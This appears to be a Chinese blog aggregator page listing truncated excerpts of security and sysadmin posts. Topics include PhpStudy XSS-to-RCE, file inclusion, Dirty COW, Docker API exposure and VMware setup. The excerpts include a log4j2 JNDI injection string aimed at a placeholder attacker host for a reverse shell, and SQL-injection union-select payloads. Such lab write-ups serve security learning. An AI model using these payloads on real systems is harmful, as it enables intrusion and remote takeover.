sudo漏洞 主机sudo1
小皮1-click漏洞的代码审计学习笔记
漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payload 实现存储型 XSS ,结合小皮本身所具有的计划任务,XSS + CSRF 实现了 RCE 。 因为用户名登录处缺少过滤,所以可以尝试 SQL 漏洞。 ......
golang CVE-2016-2183漏洞,https需要添加tls设置加密算法CipherSuites白名单,将弱加密算法DES和3DES去掉。
golang CVE-2016-2183漏洞,https需要添加tls设置加密算法白名单,将弱加密算法DES和3DES去掉。 服务端样例代码 package main import ( "crypto/tls" "fmt" "net/http" ) func handler(writer http. ......
windows 主机代理服务器搭建
https://www.php1.cn/detail/QiaoMiaoDiBa_win_18b100da.html 0x01 背景 在现实情景中,我们仅有一台windows 主机可以上网(在公司的生产环境、测试环境、各种其他场景下,由于各种安全策略或者上网限制,其他服务器均无法上网。但是我们在测试、 ......
文件包含漏洞
文件包含渗透 1.项目实验环境 2.原理及危害 文件包含漏洞: 即File Inclusion ,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数( include() , require()和include_once() ,requi ......
文件上传漏洞
文件上传漏洞原理 1、文件上传( File Upload )是大部分web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并 ......
vmware15pro的主机换了新电脑用vmware16Pro打开运行异常处理
因为换新电脑导致必须从旧笔记本上把所有试验用的虚拟机全部迁移过来, 原电脑使用的vmware15pro,创建了若干主机。新电脑开机后安装的vmware16pro,直接把安装虚拟机的文件夹全部复制到新机器下, 现象: 新电脑打开虚拟机文件时是正常的,大概一分钟左右,宿主机的CPU和内存全部100%,虚 ......
04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询
发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束 ......
sudo: unable to change to root gid: Operation not permitted
出现这个问题可能是使用了游客登录 将guest游客切换为普通用户 切换方法: ......
本地Linux主机使用SFTP上传文件到Linux云服务器_弹性云服务器 ECS
本地Linux主机使用SFTP上传文件到Linux云服务器_弹性云服务器 ECS_ 文件上传_ (dawuzhe.cn) 更新时间:2020/12/15 GMT+08:00 操作场景 本节操作以CentOS操作系统为例,介绍配置SFTP、使用SFTP上传或下载文件、文件夹的操作步骤。 操作步骤 以r ......
ubuntu16 共享主机的文件夹(实测有效)
1、主机VM软件开启共享文件夹 1)进入:虚拟机》设置》选项》共享文件夹 2)选择总是启用》点击添加》选择一个主机目录 3)保存目录》下一步》启用此共享》完成 2、ubuntu安装vmtools 1)下载包:进入:虚拟机》重新安装vmtools (如果是灰色的,进入虚拟机设置,启动项改为物理驱动,如 ......
使用vSphere Update Manager 升级 ESXi 主机
使用vSphere Update Manager 升级 ESXi 主机 vSphere Update Manager vSphere Update Manager 是用于升级、迁移、更新和修补群集主机、虚拟机和客户机操作系统的软件。 vSphere Update Manager 可协调主机和虚拟机的 ......
局域网主机共享单个公网IP地址接入Internet(SNAT)
SNAT策略的原理 源地址转换,Source Network Address Translation 修改数据包的源IP地址 1.准备一台局域网里的主机做客户机,配置好ip、子网掩码,网关,dns服务器地址 局域网各主机正确设置IP地址/子网掩码 局域网各主机正确设置默认网关地址/dns服务器地址 ......
log4j2漏洞复现
【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba ......
《渗透测试》WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等 2022 Day26
#Oracle 参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 测回显:and 1=2 union select '1','2' from dual 爆库:and 1=2 union select '1',(select table ......
Ansible_Playbook-统一为目标主机创建research逻辑卷
实验目标 在自建环境中能够测试RHCE磁盘管理题目 在部分主机上做特殊处理,使得自己练习环境与实际环境相似 实验环境 ansible配置文件 [defaults] inventory=./inventory remote_user=rhce ask_pass=false roles_path=./r ......
Docker API 未授权访问漏洞
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。 ......
数仓安全测试之SSRF漏洞
摘要:SSRF (Server-Side Request Forgery,服务器端请求伪造)是指由攻击者构造请求,然后利用服务器的漏洞以服务端的身份向内网发送请求对内网发起攻击。 本文分享自华为云社区《GaussDB(DWS)安全测试之SSRF漏洞》,作者: ACBD。 1. 什么是SSRF漏洞 S ......
Linux系列---【桥接、NAT和仅主机三种网络模式的区别】
#桥接、NAT和仅主机三种网络模式的区别 ##1.桥接模式 把虚拟出来的网卡直接连接路由器,此时虚拟机和宿主机相对于路由器来说是有两台独立ip的物理机直接连接,宿主机和虚拟机间是兄弟关系。 ##2.NAT模式 在宿主机中创建一个子网,虚拟机放在子网中,子网中有一个NAT服务,此时虚拟机和宿主机相对路 ......
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814) 概述 PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞 pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件 FreeBSD 是一种类UNIX操作系统 pfBlockerN ......
Python实时更新Windows文件到Linux/unix主机上,并将回车符"\r\n"全部替换成"\n"
为什么要这个脚本 习惯了在Windows上用JetBrain 的 PyCharm 社区版,而社区版没有远程编程的功能,所以用这个脚本实现远程编程。 把脚本的换行符替换掉,是因为\r\n在unix下会让Python脚本拥有执行权限时报错。 具体脚本 需要安装paramiko包 首先将文件的\r\n转换 ......
脏牛漏洞原理
漏洞概述 dirty cow漏洞是一种发生在写时复制的竞态条件产生的漏洞 写时复制(copy on write) 允许不同进程中的虚拟内存映射到相同物理内存页面的技术 三个重要流程 A:制作映射内存的副本 B:更新页表,是的虚拟内存指向新创建的物理内存 C 写入内存 tips:他们可以被其他线程中断 ......
解决 ssh 找不到对应主机密钥类型
解决办法 如果最近升级到了 openssh 8.8 版,你会发现连接某些之前连接得好好的服务器突然无法连接: Unable to negotiate with x.x.x.x port 2222: no matching host key type found. Their offer: ssh-r ......
Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)
漏洞主要来自于 iotdb-web-workbench IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench 中存在不正确的身份验证漏洞。 ......
showDoc漏洞
攻击者使用showDoc的漏洞传播僵尸网络 近日,阿里云安全团队基于威胁情报挖掘网络攻击日志的过程中,发现了使用showDoc漏洞传播僵尸网络和挖矿软件的攻击事件,使用该手法传播僵尸网络暂未被公开报告过。 ShowDoc是一个在线文档分享工具,面向开发者提供针对API接口的文档编写与团队协作功能。早 ......
KVM宿主机通过console登录vm虚拟机
安装好虚机之后通过vnc登录到虚拟主机,如果是centos7系统,输入下列命令: grubby --update-kernel=ALL --args="console=ttyS0,115200n8" 如果是centos6 echo 'S0:12345:respawn:/sbin/agetty tty ......
基于mysqludf_sys.so漏洞的提权
基于mysqludf_sys.so漏洞的提权 有时候目标机里会存在mysqludf_sys.so文件,那即表示数据库里可能存在用户自定义的功能函数。 UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数 ......
小皮Windows web面板漏洞详解
PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 小皮 Windows web 面板存在存储型 xss 漏洞,结合后台计划任务即可实现 RCE。 ......
《渗透测试》WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL 2022 Day25
1 mysql一些命令介绍 1 load_file() 通过select load_file('xx.xx');读取文件 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allow ......